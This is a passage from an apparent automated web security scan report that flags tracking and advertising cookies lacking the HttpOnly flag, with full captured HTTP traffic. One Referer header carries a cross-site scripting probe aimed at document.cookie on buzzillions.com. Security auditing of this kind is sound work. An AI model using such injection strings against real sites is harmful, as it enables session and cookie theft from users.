Set-Cookie: bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:07:36 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 0
Content-Type: text/html
Connection: keep-alive


13.209. http://tags.bluekai.com/site/353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/353

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/353?rand=0.9526619226671755 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=UE2gfLUR22QsHNJo; bkc=KJh56AN/PaWDOded7UcDzVSyZWP3EWcGSWJDvJivmD1nStebQYQBLzxwSYaVZhnEWDxALA6afSxQS0aRTvnGSps6SOzWxMOrQCYeiej3Wag7Fw4rrlwr8MNIFwX88lcFvjxe7bXeTSN1PQWGAeIBuFKVseXn9dDExmNbJCrWzFhQEw3IjSfU4CQOuLLPZ+454rheH0c1KKNXCKrqUTtwHbuMKK1ymE6kwEQ+dKsHXSLxrx5RcedkIlHWZr5gFbwbWooUrsDXK6YSX2GXM2IpPPtmaflF4I1cL0cWo2M+12nn0XjePnuys8MFmrcDL82S87fSKU3X39aZq74uKV2ULozLzN8fUypGgkBT7DrH7NKy40RCpc7+KIHppxgJsIkLacF9c3bE8gptJmNw3WaCw87dMdtu23FRu8S8U7rrpwDs7Dz9FyqR7UluvzrJYK1arLLttg5dwp3z4rhMkgZdBC6dHL74ilpPz32krQf4yfxFvhKOnbr+F3+i6k0FcRLYmfLDwrjS4sIPu7BKIp05EI1/1eJolsYjX2GUFwX2Tp77pqXVBn8LIDIlzDdxpqXB+Be2OhhwJbx4B6AdLUyo3Upd2FqdVXe+ppTqAx8ru1IPv5IPl76PiohoAkfqk/fFPqffF4l4KUmW2LwNdaNMKwLf5nMH0qwE5bHUSoUyIbH65qN6K6gbomUWaKwdFfdTqQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:51:17 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 04 Feb 2011 20:51:17 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=Rs4UCXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56AN/PaWDOded7UcDzVSyZWPZEWcGSWJAvsivmA1nStebQYQBbRBuzYamqEHuHhYH6eRP+JmYg/PQQRrigXUxGk6xY1s6YD/1/+3RxVu5X2bffXb8ZhkIFwX88lnFvPRYcbTOTSN1PQWGA+IwuQIDsEXm9ytExBNsJCrWz7plCFx50N0F4uXYkaz3+sbTd5Qce6mRX23av+5M7T0f/2nHQ7sR7JbVFMGMd4SIX41xrH2RF77z2TZ/B1dU4AlNjEuFmsTX+NISX2GXMdd7S7G5nlF4dXxwjWm/Ef1fjbPUPT6c3VCoJfeRK2uojpI0pwt6YdEp+OSR7KiCId8qpPbhpc7+FEsQgNfCHE8a4knadobW1mKNq8Bw+0GAgbKpDKyYKbCKZFwSDfxdGDSa4VxIcdLjfPKoP0hpF4jYCK+BrGX94khC2N0xEkkmEOGF6P+t6nf2I2qk2smlVIqIt7E2sYPdn4sy8xcn2O0ICtC4NLTOcpX4XP6EAIjbfPQDtBbCXYf487rgUJgptZ4G4oosQJWoT6qn7BzIb8llomKXBpXUBn8GIUK4zUdxpqXv+BcfOhpwJvx4+WQd+cyI3Upd2wqduXe+ppTPAx8rui2DvBdPl7LPu8hoAPfdJHl4Glh42FjdItDp7uKUR0dmsXwqlXaeEDbK7qTkFPS7CBXAoUzlucKZo/2jEky0dQIhCFGy; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:51:17 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.210. http://tags.bluekai.com/site/365  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/365

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/365 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bk=viY1yZVZbt/sHNJo; bkc=KJh566N/PaWDOded7uX5jySnVExVAh9b4AODvaCJmD1nStnbQYQBbRBuSYWp+uAocDaW/++D6YTvLCSYOubvoko1n+GaQHO1Z0eYx1vBsDx48Xhf2NlwlqpcMdzd2f8fpftk1n9y9ixSer5XYvaW4Z58/s9XPQLWVhDSgtE/MVlL8lA/pN7ZKrlp0Fc4Pp+p9Hxvf9KlMYrDdl9jYv2kzdxJfw58SSfU4AndNp/vBYNkzlbG3rImuBIhpwUS20J93aSCzXAjMfN2aTx8gNtrzlpNAdcIicu6qOyZjXSkn68/FfNFdYJ/fQ5Zghd04Yxip4BgFbqb91NUrVRX+DtSX2GXcfI7WgNPpfg44X4qzAcWh275A2npXXSePeupAUgVKbOSpl8LZz4En+wMtVjQXARwf4K4KFSzjz8gqT6O4z6vnT+oX+1b27/vyopUFA6Il3ZxGF1PhuSyC83kmSX2UKBTk5qMyTXnfJTp6Z7n0PcMsKgaUMGFdffF3bbwF5L0Mb2BtTzXIKLbUf/XRJZt6d1x2UFhawehXhfwijQ6NtFcG7uUBiQLanLXgTVAmS22Qr8EIp9ywsqzSo7pti45dpl3rrMmUd9q7fUX3XITlIdAufTrboIFbGZA211mbDKVEbKD8hUldcfhmKmpM6VAdSFu6pUvzflqgXGbjprAFdtDMZ2H7rsKgXW5fjTpBbDUZ8EyZ8H6xT+65NgbGmUAmKwdAK9Ydx==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 21:59:56 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 04 Feb 2011 21:59:56 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=gsKMbtVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NW+GWNWDOrOdXZgEJnuuCSAuY2vAehYPa3GVqRvnSAoXQBCVQQI6OHzC6R6VqH1GoRCNGT/fDqYbvauCYXV3i2iam6WGYcWMiaxGT3jVWOd7EmqmfqZqZ47/4Ib8zII58Yl9Vyj0iRWLwuJwk8hwKpW/n/6OLKSOg9zOttXBzN88GCfy+N+GrjyZ+luy7hDQwsIRb8Uwm4ldF+0P2SaRjBId3Ptkdw+nxc92RXIwdSTQp4UvMtkIqKB9b6GZbTPkIXbR2sleUv2XByxWbiN6g2EsRIdReVcmvNzSSgf0D4+9ueoz6xbu6tUoY8wuqI8owdKECTs8ST55cykJzldkPNEFGlfP32gEtbD8gXp2IeT5bfz28dpIm23H2uBSjF5muuXLS/2x6KyZtgwIQlR2I8aCcAI8xoK7VTYoblt6l7XSt4msmSIXnx/1Ju0XvvU/EhgR36A/zNf8aFkT+TDA7SXyBG12ZoeZFwJ1UzNg2eTK4edwfML+7E/zc2KKoqlRHI4klf422Frh2hMZXjPoIP9Q427QiTjpCZA8URdu4iXw9CXIfUD5i6CpFU/AEB2uATVkDGdg2R9688Pw6w4DZS4dCx7+5LmzPpfopwKGT8nEFIMPwZwTN8etLnKVUdE66w88qWdsoH26uEX64Yoor4fC7Bdw7+gTfs1CSKIS2W058qgHtSd3OZKbondIk/8r+PpemPXMmp+5ot2/nf5Sy3IE6LN+6g6obDmsTtKNdymwKyqy; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:59:56 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.211. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:56 GMT
Expires: Thu, 03 Feb 2011 20:32:56 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

13.212. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Impression/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Tracking/V3/Instream/Impression/?0|1574|42244|30521|5745|14160|HEADER|868|2293|413|BBEEND|&internalRedirect=true&cb=%timestamp%&ss_rand=98204660 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Date: Thu, 03 Feb 2011 21:14:09 GMT
Expires: -1
Location: http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30;sz=1x1;pc=[TPAS_ID];ord=[634323464497011872]?
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; domain=.vindicosuite.com; expires=Sat, 05-Mar-2011 21:14:09 GMT; path=/
Set-Cookie: 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; domain=.vindicosuite.com; expires=Fri, 03-Feb-2012 21:14:09 GMT; path=/
Set-Cookie: 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; domain=.vindicosuite.com; expires=Fri, 03-Feb-2012 21:14:09 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive


13.213. http://uat.netmng.com/pixel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /pixel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/?aid=148&tax=home HTTP/1.1
Host: uat.netmng.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evo5=kvrgygjr7baud%7C5SyprRh6TrnFV2ndAy2HxCPgLLX3cZ%2FVfx%2FM0biott%2BcqVbJj5aCj55h7IXdjMgE9ed9rfydUW6gLxzZ4Z8iZfTCEnvI5PEwDP8UgnDwsNwf1a3vDJnVlaVWQNH%2F7d2VqxBrm0%2Fc%2FidZYflVD0ff%2F1E5rmifbqDgfH2Gt1zhs%2F2MnA08vEEPGokDm1Bn1W68QLHQ%2FzChSJMJNtyVsrnHyb3E37wmvDfW6FFUnXFOPDqGRb7GXzLEZaSRaSPR19puBUpHlUpXwBEY7g3LfZ4F7q%2FoPuX4s88d6II7AqTrPBQvVC3dTHYL6Y342A5GTpvcniShvZas%2BmBrU%2Fz%2FqdmcKtLQoSpK8%2F1EMObPX4EqA7WzFB9kMN0WKt0l5SlxdqQCviV0iLESOVRgETizb2Os%2Fh1P9v%2FlebIMxnWdfb6%2Byln%2FJfmz2fudQYM%2FGfUhPWgueSqcoFf5wfZykby2hBxGOg%3D%3D

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:03:59 GMT
Server: Apache/2.2.9
P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 01 Feb 2011 19:03:59 GMT
Last-Modified: Tue, 01 Feb 2011 19:03:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=kvrgygjr7baud%7CslbpB2OTqHJebVm%2BWLYhLSxmpA%2Bk0H4X%2BmBxXDdVODzOuKT2fiN3y3Y5%2FY%2FsvrMTk5MmDBp7hV7I6KwNAhVYdGvfRM%2Bt5tHVREa3RQX0svzHDl1LVEJkUgauiKULoRLwV%2Bz9EfZ7EbNR6AyPAOiKR2YDLplc5ZP%2FSQ6vGBOIIKPOPjcxxchwc%2Bo4nA5%2BXAHnXvznrsmn%2BcXyzWJFyo%2F7gsKfwS18nNxmub3nTC7jXt6PqmgrUCGB0%2B0vqAMDbEWNWkKk8aNor%2FvzClvR9YGDE1DDjaV8XMfY5k93PKcy7%2BcHAUsxt54LRmbEVOmofd1fIHKn0lsrW9GvKMll8AI8rXfZqe1UwR5PeLBmj4zS2RGDv2trchNe4um3wRa%2BvF6pKy4VT%2BDhUwGQ4LAm8Yog8lNAItduejTtfC9gbzyZMGm7yKAmWVLRZLZBSm7SpNBnA4SM6uA0wtdfTynqTvb5Hw%3D%3D; expires=Fri, 05-Aug-2011 19:03:59 GMT; path=/; domain=.netmng.com
Location: http://ad.yieldmanager.com/pixel?id=582755&id=584778&id=584789&t=2
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8


13.214. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:33:04 GMT
Expires: Thu, 03 Feb 2011 20:33:04 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=1be32f5d81ed4b3b:TM=1296765184:LM=1296765184:S=XUl03TgBOSGxaiOV; expires=Sat, 02-Feb-2013 20:33:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

13.215. http://w.ic.tynt.com/b/o  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.ic.tynt.com
Path:   /b/o

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/o?id=cD5Q7abi8r4inHadbi-bnq&i=http%3A%2F%2Fa.collective-media.net%2Fadi%2Flb.buzzillions%2F%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D1296770389%3F&ts=1296770455256 HTTP/1.1
Host: w.ic.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 03 Feb 2011 22:00:05 GMT
Content-Type: image/gif
Content-Length: 35
Last-Modified: Mon, 22 Nov 2010 21:57:50 GMT
Connection: keep-alive
Cache-Control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
Expires: "Sat, 26 Jul 1997 05:00:00 GMT"
Set-Cookie: uid=CgUVak1LJWWFQj/PC/lcAg==; expires=Fri, 03-Feb-12 22:00:05 GMT; domain=tynt.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

GIF89a.............,...........D..;

13.216. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 21:48:43 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2Fkids-abc-development-inc-cntrl-sesame-street-water-teether-reviews%2Fx22%3Fcategory%3Dabc-development-inc-cntrl-sesame-street-water-teether%26brand%3Dreviews%26gender%3Dkids; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Set-Cookie: bzid=1296769723899; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Location: /kids-reviews
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


13.217. http://www.dhgate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhgate.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dhgate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: text/html
Content-Language: zh-CN
Date: Thu, 03 Feb 2011 21:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: vid=rBABeU1LIshUmnTRCKTHAg==; expires=Wed, 29-Jan-31 21:48:56 GMT; path=/
Content-Length: 56077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13.218. http://www.everycarlisted.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everycarlisted.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.everycarlisted.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

